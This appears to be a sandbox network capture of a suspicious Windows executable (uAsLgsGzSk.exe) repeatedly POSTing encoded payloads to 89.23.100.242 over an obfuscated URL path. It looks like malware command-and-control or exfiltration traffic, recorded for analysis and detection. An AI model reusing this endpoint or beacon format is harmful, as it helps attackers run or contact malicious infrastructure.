                                                                                                Jan 10, 2025 07:58:14.849236965 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:15.204655886 CET2544OUTData Raw: 59 5f 46 57 5e 57 56 5f 58 5b 57 56 50 5e 5b 57 55 57 5e 5e 54 5a 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: Y_FW^WV_X[WVP^[WUW^^TZQXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'D,W;+-1^(,*=+=8+;;64;W( <*<"& 0'_!/Y.=
                                                                                                Jan 10, 2025 07:58:15.611236095 CET225INHTTP/1.1 100 Continue
                                                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 38 3a 31 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:58:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                49192.168.2.44989389.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:15.738004923 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:58:16.095899105 CET2544OUTData Raw: 59 53 43 5e 5e 5a 53 52 58 5b 57 56 50 5a 5b 54 55 50 5e 5f 54 5d 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YSC^^ZSRX[WVPZ[TUP^_T]QZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'A/1#X+=1^?6Z,9R?[$Y?8 "7$(?[+?)1=&:'_!/Y.-
                                                                                                Jan 10, 2025 07:58:16.493371964 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:16.628550053 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:16 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                50192.168.2.44990089.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:16.754162073 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2536
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:58:17.111007929 CET2536OUTData Raw: 5c 52 43 57 5e 59 56 5e 58 5b 57 56 50 5b 5b 50 55 51 5e 5d 54 5c 51 52 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \RCW^YV^X[WVP[[PUQ^]T\QRRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;!'[?>:?;,:%T?7<+(6'U<7Y+/!&?':'_!/Y.%
                                                                                                Jan 10, 2025 07:58:17.499454021 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:17.634829998 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:17 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                51192.168.2.44990889.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:17.940373898 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:18.298494101 CET2544OUTData Raw: 59 52 43 54 5e 57 53 52 58 5b 57 56 50 52 5b 52 55 5d 5e 52 54 59 51 52 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YRCT^WSRX[WVPR[RU]^RTYQRRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'83(9^+57,"<((;(X5P?'=)2+&*'_!/Y.
                                                                                                Jan 10, 2025 07:58:18.682701111 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:18.816788912 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:18 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                52192.168.2.44991589.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:18.940762997 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:19.298449039 CET2544OUTData Raw: 59 54 43 55 5e 5a 56 50 58 5b 57 56 50 53 5b 57 55 55 5e 59 54 5d 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YTCU^ZVPX[WVPS[WUU^YT]QXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'D,;?>9<&[,:&?+8$67(0)?2[7':'_!/Y.
                                                                                                Jan 10, 2025 07:58:19.712601900 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:19.842578888 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:19 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                53192.168.2.44992589.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:20.254432917 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:20.610934019 CET2544OUTData Raw: 59 55 43 57 5b 59 53 57 58 5b 57 56 50 5e 5b 5a 55 52 5e 5d 54 50 51 53 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YUCW[YSWX[WVP^[ZUR^]TPQSRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$/2'+.=^(5'8*?.')8!4+U *>&3'_!/Y.=


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                54192.168.2.44992689.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:20.510812998 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2036
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:20.861207008 CET2036OUTData Raw: 59 51 43 57 5b 5b 56 56 58 5b 57 56 50 5d 5b 51 55 55 5e 5b 54 5a 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YQCW[[VVX[WVP][QUU^[TZQZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'C8'?=%(/)%(>(]?86'?+##^)?&.7$'_!/Y.1
                                                                                                Jan 10, 2025 07:58:21.384130001 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:21.438735962 CET349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:21 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 1e 39 54 34 3b 28 56 25 2c 35 57 3a 06 3e 0a 2b 20 3f 06 2a 03 20 03 3e 20 3f 57 3a 01 2f 1e 35 28 2e 04 2b 1c 3d 0a 26 3c 30 1e 27 37 21 59 0c 13 26 13 3f 04 04 0e 3d 3a 02 13 28 0f 0b 19 30 1d 37 1d 30 3d 3d 16 20 01 30 5a 3f 2a 29 51 2a 31 0c 0c 2d 07 2c 17 28 3c 0e 55 30 36 2a 57 0c 1f 26 52 22 21 39 13 21 21 36 58 27 16 27 10 33 01 3c 57 24 2f 20 05 23 04 27 58 2c 29 05 03 22 2d 2b 02 3e 3d 2d 0e 22 0b 37 09 2b 2c 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989T4;(V%,5W:>+ ?* > ?W:/5(.+=&<0'7!Y&?=:(070== 0Z?*)Q*1-,(<U06*W&R"!9!!6X''3<W$/ #'X,)"-+>=-"7+, Q""P0]Q0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                55192.168.2.44993089.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:20.786803007 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:21.142388105 CET2544OUTData Raw: 5c 51 43 54 5e 5d 56 52 58 5b 57 56 50 58 5b 5b 55 52 5e 5f 54 5a 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \QCT^]VRX[WVPX[[UR^_TZQXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR';/Y?>%[?Z/:*($<4"4;U<=@%8Y3:'_!/Y.%
                                                                                                Jan 10, 2025 07:58:21.607119083 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:21.759690046 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:21 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                56192.168.2.44993889.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:21.888396978 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:58:22.235941887 CET2544OUTData Raw: 59 56 43 5f 5e 5d 56 52 58 5b 57 56 50 5f 5b 54 55 55 5e 5b 54 50 51 5e 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YVC_^]VRX[WVP_[TUU^[TPQ^RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$8 <==<%(,\=R+-()+ \"7'W(X=<!2[8\&*'_!/Y.9
                                                                                                Jan 10, 2025 07:58:22.624304056 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:22.756917953 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:22 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                57192.168.2.44994489.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:23.446549892 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:23.798440933 CET2544OUTData Raw: 5c 53 43 5e 5b 5b 56 57 58 5b 57 56 50 53 5b 5a 55 51 5e 5d 54 5e 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \SC^[[VWX[WVPS[ZUQ^]T^Q\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'C,1/]?=%>6$Z-)!<- \);$#4U<34*Y>$>4X0:'_!/Y.
                                                                                                Jan 10, 2025 07:58:24.203321934 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:24.340606928 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:24 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                58192.168.2.44995589.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:24.474577904 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2536
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:24.829755068 CET2536OUTData Raw: 59 55 46 55 5b 5e 56 53 58 5b 57 56 50 5b 5b 5a 55 5d 5e 5f 54 51 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YUFU[^VSX[WVP[[ZU]^_TQQ\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;]>=1?6/.(,^<8+!4,<U7)<=2<$'_!/Y.
                                                                                                Jan 10, 2025 07:58:25.264178991 CET225INHTTP/1.1 100 Continue
                                                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 38 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:58:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                59192.168.2.44996089.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:25.396646976 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
